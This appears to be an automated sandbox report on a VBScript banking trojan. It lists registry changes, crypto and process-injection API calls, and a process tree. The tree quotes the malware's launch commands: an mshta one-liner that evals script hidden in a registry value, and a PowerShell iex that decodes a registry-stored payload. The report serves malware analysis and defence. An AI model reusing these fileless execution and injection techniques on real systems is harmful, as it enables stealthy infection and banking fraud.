Source: Yara match File source: 0000001F.00000002.781275414.000002175F5E8000.00000004.00000001.sdmp, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E53276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 21_2_00E53276

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E5725F 21_2_00E5725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57E30 21_2_00E57E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E51754 21_2_00E51754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05593570 21_2_05593570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05575C88 21_2_05575C88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055710E6 21_2_055710E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055790A1 21_2_055790A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05587B5D 21_2_05587B5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05584B1F 21_2_05584B1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055843B9 21_2_055843B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557FBA9 21_2_0557FBA9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557423D 21_2_0557423D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558DAED 21_2_0558DAED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055952A0 21_2_055952A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EE95C 31_2_000002174F3EE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FB948 31_2_000002174F3FB948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FB230 31_2_000002174F3FB230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F06B4 31_2_000002174F3F06B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F6EA0 31_2_000002174F3F6EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E6684 31_2_000002174F3E6684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D76F4 31_2_000002174F3D76F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F5ED8 31_2_000002174F3F5ED8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EC6C4 31_2_000002174F3EC6C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E2EC0 31_2_000002174F3E2EC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F2EF8 31_2_000002174F3F2EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E559C 31_2_000002174F3E559C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E1DF4 31_2_000002174F3E1DF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F4DE0 31_2_000002174F3F4DE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E5DBC 31_2_000002174F3E5DBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D3610 31_2_000002174F3D3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D74A4 31_2_000002174F3D74A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E4484 31_2_000002174F3E4484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E9500 31_2_000002174F3E9500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D4B60 31_2_000002174F3D4B60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F4354 31_2_000002174F3F4354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D1348 31_2_000002174F3D1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E8340 31_2_000002174F3E8340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FA3A4 31_2_000002174F3FA3A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F4BA0 31_2_000002174F3F4BA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3DABDC 31_2_000002174F3DABDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F9408 31_2_000002174F3F9408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F3400 31_2_000002174F3F3400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EBA74 31_2_000002174F3EBA74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D9AD8 31_2_000002174F3D9AD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3ED328 31_2_000002174F3ED328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F730C 31_2_000002174F3F730C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F5164 31_2_000002174F3F5164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E1164 31_2_000002174F3E1164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E4150 31_2_000002174F3E4150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D0000 31_2_000002174F3D0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D2138 31_2_000002174F3D2138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EA9F8 31_2_000002174F3EA9F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E70C8 31_2_000002174F3E70C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F88B8 31_2_000002174F3F88B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E0124 31_2_000002174F3E0124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D90FC 31_2_000002174F3D90FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F404796 31_2_000002174F404796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EF7B4 31_2_000002174F3EF7B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EA790 31_2_000002174F3EA790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E7820 31_2_000002174F3E7820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3D1000 31_2_000002174F3D1000
Source: C:\Windows\System32\control.exe Code function: 38_2_000DB948 38_2_000DB948
Source: C:\Windows\System32\control.exe Code function: 38_2_000CE95C 38_2_000CE95C
Source: C:\Windows\System32\control.exe Code function: 38_2_000DB230 38_2_000DB230
Source: C:\Windows\System32\control.exe Code function: 38_2_000D3400 38_2_000D3400
Source: C:\Windows\System32\control.exe Code function: 38_2_000B1000 38_2_000B1000
Source: C:\Windows\System32\control.exe Code function: 38_2_000C7820 38_2_000C7820
Source: C:\Windows\System32\control.exe Code function: 38_2_000D88B8 38_2_000D88B8
Source: C:\Windows\System32\control.exe Code function: 38_2_000C70C8 38_2_000C70C8
Source: C:\Windows\System32\control.exe Code function: 38_2_000B90FC 38_2_000B90FC
Source: C:\Windows\System32\control.exe Code function: 38_2_000C0124 38_2_000C0124
Source: C:\Windows\System32\control.exe Code function: 38_2_000B2138 38_2_000B2138
Source: C:\Windows\System32\control.exe Code function: 38_2_000C6944 38_2_000C6944
Source: C:\Windows\System32\control.exe Code function: 38_2_000C4150 38_2_000C4150
Source: C:\Windows\System32\control.exe Code function: 38_2_000C1164 38_2_000C1164
Source: C:\Windows\System32\control.exe Code function: 38_2_000D5164 38_2_000D5164
Source: C:\Windows\System32\control.exe Code function: 38_2_000CA9F8 38_2_000CA9F8
Source: C:\Windows\System32\control.exe Code function: 38_2_000CBA74 38_2_000CBA74
Source: C:\Windows\System32\control.exe Code function: 38_2_000B9AD8 38_2_000B9AD8
Source: C:\Windows\System32\control.exe Code function: 38_2_000D730C 38_2_000D730C
Source: C:\Windows\System32\control.exe Code function: 38_2_000CD328 38_2_000CD328
Source: C:\Windows\System32\control.exe Code function: 38_2_000B1348 38_2_000B1348
Source: C:\Windows\System32\control.exe Code function: 38_2_000C8340 38_2_000C8340
Source: C:\Windows\System32\control.exe Code function: 38_2_000D4354 38_2_000D4354
Source: C:\Windows\System32\control.exe Code function: 38_2_000B4B60 38_2_000B4B60
Source: C:\Windows\System32\control.exe Code function: 38_2_000DA3A4 38_2_000DA3A4
Source: C:\Windows\System32\control.exe Code function: 38_2_000D4BA0 38_2_000D4BA0
Source: C:\Windows\System32\control.exe Code function: 38_2_000BABDC 38_2_000BABDC
Source: C:\Windows\System32\control.exe Code function: 38_2_000D9408 38_2_000D9408
Source: C:\Windows\System32\control.exe Code function: 38_2_000C4484 38_2_000C4484
Source: C:\Windows\System32\control.exe Code function: 38_2_000B74A4 38_2_000B74A4
Source: C:\Windows\System32\control.exe Code function: 38_2_000C9500 38_2_000C9500
Source: C:\Windows\System32\control.exe Code function: 38_2_000C559C 38_2_000C559C
Source: C:\Windows\System32\control.exe Code function: 38_2_000C5DBC 38_2_000C5DBC
Source: C:\Windows\System32\control.exe Code function: 38_2_000D4DE0 38_2_000D4DE0
Source: C:\Windows\System32\control.exe Code function: 38_2_000C1DF4 38_2_000C1DF4
Source: C:\Windows\System32\control.exe Code function: 38_2_000B3610 38_2_000B3610
Source: C:\Windows\System32\control.exe Code function: 38_2_000C6684 38_2_000C6684
Source: C:\Windows\System32\control.exe Code function: 38_2_000D6EA0 38_2_000D6EA0
Source: C:\Windows\System32\control.exe Code function: 38_2_000D06B4 38_2_000D06B4
Source: C:\Windows\System32\control.exe Code function: 38_2_000CC6C4 38_2_000CC6C4
Source: C:\Windows\System32\control.exe Code function: 38_2_000C2EC0 38_2_000C2EC0
Source: C:\Windows\System32\control.exe Code function: 38_2_000D5ED8 38_2_000D5ED8
Source: C:\Windows\System32\control.exe Code function: 38_2_000D2EF8 38_2_000D2EF8
Source: C:\Windows\System32\control.exe Code function: 38_2_000B76F4 38_2_000B76F4
Source: C:\Windows\System32\control.exe Code function: 38_2_000CA790 38_2_000CA790
Source: C:\Windows\System32\control.exe Code function: 38_2_000CF7B4 38_2_000CF7B4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ADB948 40_2_00000195D8ADB948
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ADB230 40_2_00000195D8ADB230
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ADA3A4 40_2_00000195D8ADA3A4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD4BA0 40_2_00000195D8AD4BA0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACF7B4 40_2_00000195D8ACF7B4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACA790 40_2_00000195D8ACA790
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ABABDC 40_2_00000195D8ABABDC
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACD328 40_2_00000195D8ACD328
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD2EF8 40_2_00000195D8AD2EF8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD730C 40_2_00000195D8AD730C
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB4B60 40_2_00000195D8AB4B60
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC8340 40_2_00000195D8AC8340
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD4354 40_2_00000195D8AD4354
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB1348 40_2_00000195D8AB1348
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB74A4 40_2_00000195D8AB74A4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC4484 40_2_00000195D8AC4484
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD88B8 40_2_00000195D8AD88B8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC70C8 40_2_00000195D8AC70C8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC7820 40_2_00000195D8AC7820
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB1000 40_2_00000195D8AB1000
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD3400 40_2_00000195D8AD3400
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD9408 40_2_00000195D8AD9408
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC559C 40_2_00000195D8AC559C
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD4DE0 40_2_00000195D8AD4DE0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC1DF4 40_2_00000195D8AC1DF4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC5DBC 40_2_00000195D8AC5DBC
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC0124 40_2_00000195D8AC0124
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC9500 40_2_00000195D8AC9500
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB90FC 40_2_00000195D8AB90FC
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD5164 40_2_00000195D8AD5164
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC1164 40_2_00000195D8AC1164
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACE95C 40_2_00000195D8ACE95C
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC6944 40_2_00000195D8AC6944
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB2138 40_2_00000195D8AB2138
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC4150 40_2_00000195D8AC4150
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD6EA0 40_2_00000195D8AD6EA0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD06B4 40_2_00000195D8AD06B4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC6684 40_2_00000195D8AC6684
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB9AD8 40_2_00000195D8AB9AD8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD5ED8 40_2_00000195D8AD5ED8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB76F4 40_2_00000195D8AB76F4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACC6C4 40_2_00000195D8ACC6C4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AC2EC0 40_2_00000195D8AC2EC0
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACA9F8 40_2_00000195D8ACA9F8
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AB3610 40_2_00000195D8AB3610
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACBA74 40_2_00000195D8ACBA74
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AEF5CC 40_2_00000195D8AEF5CC
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557E6B4 CreateProcessAsUserA, 21_2_0557E6B4
Java / VBScript file with very long strings (likely obfuscated code)
Source: 345678.vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E540DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_00E540DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E56EB3 GetProcAddress,NtCreateSection,memset, 21_2_00E56EB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E57666 NtMapViewOfSection, 21_2_00E57666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_00E58055 NtQueryVirtualMemory, 21_2_00E58055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558B58C NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 21_2_0558B58C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558A71C NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_0558A71C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055737F6 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset, 21_2_055737F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558F7F5 NtQueryInformationProcess, 21_2_0558F7F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0559079B GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, 21_2_0559079B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05586657 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 21_2_05586657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05580E3E NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, 21_2_05580E3E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055909D7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, 21_2_055909D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558B878 GetProcAddress,NtCreateSection,memset, 21_2_0558B878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05585878 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, 21_2_05585878
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558A8F7 NtMapViewOfSection, 21_2_0558A8F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05588890 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05588890
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05579D36 NtGetContextThread,RtlNtStatusToDosError, 21_2_05579D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_055855D6 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, 21_2_055855D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05580CEF NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, 21_2_05580CEF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0557579C NtQuerySystemInformation,RtlNtStatusToDosError, 21_2_0557579C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05580FBD memset,NtQueryInformationProcess, 21_2_05580FBD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05575166 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, 21_2_05575166
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_0558FBB9 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 21_2_0558FBB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05590BAB NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, 21_2_05590BAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E8B90 NtMapViewOfSection, 31_2_000002174F3E8B90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E5B80 NtCreateSection, 31_2_000002174F3E5B80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EE95C NtSetContextThread,NtUnmapViewOfSection, 31_2_000002174F3EE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3E1950 NtWriteVirtualMemory, 31_2_000002174F3E1950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3EE860 NtQueryInformationProcess, 31_2_000002174F3EE860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3F20A4 NtQueryInformationToken,NtQueryInformationToken, 31_2_000002174F3F20A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 31_2_000002174F3FA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread, 31_2_000002174F3FA8F0
Source: C:\Windows\System32\control.exe Code function: 38_2_000CE860 NtQueryInformationProcess, 38_2_000CE860
Source: C:\Windows\System32\control.exe Code function: 38_2_000D20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 38_2_000D20A4
Source: C:\Windows\System32\control.exe Code function: 38_2_000DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 38_2_000DA8F0
Source: C:\Windows\System32\control.exe Code function: 38_2_000DD110 RtlAllocateHeap,NtQueryInformationProcess, 38_2_000DD110
Source: C:\Windows\System32\control.exe Code function: 38_2_000CE95C NtSetContextThread,NtUnmapViewOfSection,NtClose, 38_2_000CE95C
Source: C:\Windows\System32\control.exe Code function: 38_2_000C1950 NtWriteVirtualMemory, 38_2_000C1950
Source: C:\Windows\System32\control.exe Code function: 38_2_000C5B80 NtCreateSection, 38_2_000C5B80
Source: C:\Windows\System32\control.exe Code function: 38_2_000C8B90 NtMapViewOfSection, 38_2_000C8B90
Source: C:\Windows\System32\control.exe Code function: 38_2_000BFCA8 NtAllocateVirtualMemory, 38_2_000BFCA8
Source: C:\Windows\System32\control.exe Code function: 38_2_000B4580 NtReadVirtualMemory, 38_2_000B4580
Source: C:\Windows\System32\control.exe Code function: 38_2_000EF004 NtProtectVirtualMemory,NtProtectVirtualMemory, 38_2_000EF004
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AD20A4 NtQueryInformationToken,NtQueryInformationToken,NtClose, 40_2_00000195D8AD20A4
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8ACE860 NtQueryInformationProcess, 40_2_00000195D8ACE860
Source: C:\Windows\System32\rundll32.exe Code function: 40_2_00000195D8AEF004 NtProtectVirtualMemory,NtProtectVirtualMemory, 40_2_00000195D8AEF004
PE file does not import any functions
Source: wyozc5bn.dll.35.dr Static PE information: No import functions for PE file found
Source: uitt4j30.dll.33.dr Static PE information: No import functions for PE file found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210910 Jump to behavior
Source: classification engine Classification label: mal100.bank.troj.evad.winVBS@29/21@5/1
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\345678.vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES36.tmp' 'c:\Users\user\AppData\Local\Temp\uitt4j30\CSC1FA535E1192D4199A0DB18CBAD2D0A9.TMP'
